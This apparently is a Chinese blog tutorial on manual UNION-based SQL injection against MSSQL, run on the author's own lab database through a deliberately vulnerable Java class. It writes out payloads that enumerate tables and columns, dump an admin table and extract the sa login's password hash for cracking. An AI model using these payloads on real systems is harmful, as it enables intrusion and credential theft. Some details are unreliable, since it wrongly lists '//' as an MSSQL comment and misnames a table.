接着上一篇的《mysql手工注入》
參考:http://hi.baidu.com/ciqing_s/item/971bf994365130accc80e5ed
http://hi.baidu.com/moon4ins/item/ed3b181ae472cce139cb30c4
必備知識:
MSSQL注釋符號: // 或 – --
也就是說上面兩個符號后面的內容會被忽略
環境:
代碼還是之前的代碼
public class TestSql { public static void main(String[] args) throws InstantiationException, IllegalAccessException, ClassNotFoundException, SQLException { DateExecute de = new DateExecute("MSSQL", "sa", "xxxxxxx","school"); String name = "mynona"; String address="gdut"; name = "mynona' and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--"; String sql ="select * from student where name = '" + name + "' and address = '" + address +"'"; //sql = "select name, password_hash from sys.sql_logins"; System.out.println("執行sql:"); System.out.println(sql); System.out.println("輸出結果:"); System.out.println(de.getDateList(sql)); } }
數據庫:
目標:
我們看一下視圖,發現和mysql很像
可以看到有INFORMATION.SCHEMA.TABLES和INFORMATION.SCHEMA.COLUMNS表
我們完全可以利用mysql手工注入的方法
在上面的視圖里面,再往下:
我們的目標就是上面那個表的name和password
查看當前select字段數
name = "mynona' order by 1--"; ok name = "mynona' order by 2--"; ok name = "mynona' order by 3--"; ok name = "mynona' order by 4--"; error
可以得出當前select 語句字段數是3
暴數據庫名:
name = "mynona' and 1=2 union select 1,db_name(),3--";
執行sql:
select * from student where name = 'mynona' and 1=2 union select 1,db_name(),3--' and address = 'gdut'
輸出結果:
[{id=1, address=3, name=school}]
可是數據庫名為school
遍歷當前數據庫的表
name = "mynona' and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--";
執行sql:
select * from student where name = 'mynona' and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--' and address = 'gdut'
輸出結果:
[{id=1, address=admin, name=2}, {id=1, address=student, name=2}, {id=1, address=sysdiagrams, name=2}]
可知表為:admin, school , sysdiagrams
遍歷指定admin的字段
name = "mynona' and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'admin'--";
執行sql:
select * from student where name = 'mynona' and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'admin'--' and address = 'gdut'
輸出結果:
[{id=1, address=id, name=2}, {id=1, address=name, name=2}, {id=1, address=password, name=2}]
可知表admin的字段為:id, name, password
遍歷admin表數據:
name = "mynona' union select id, name, password from admin--";
執行sql:
select * from student where name = 'mynona' union select id, name, password from admin--' and address = 'gdut'
輸出結果:
[{id=1, address=mynona, name=admin}, {id=1, address=gdut, name=mynona}]
即:id=1, address=mynona, name=admin
遍歷sys.sql_logins表
name = "mynona' and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--";
執行sql:
select * from student where name = 'mynona' and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--' and address = 'gdut'
輸出結果:
[{id=1, address=0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a, name=sa}, {id=1, address=0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f, name=##MS_PolicyEventProcessingLogin##}, {id=1, address=0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f, name=##MS_PolicyTsqlExecutionLogin##}]
可以得到:用戶sa的password_hash 為0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a
拿這個hash值破解就可以得到sa的密碼了
這篇和上一篇的源文件和測試項目下載地址: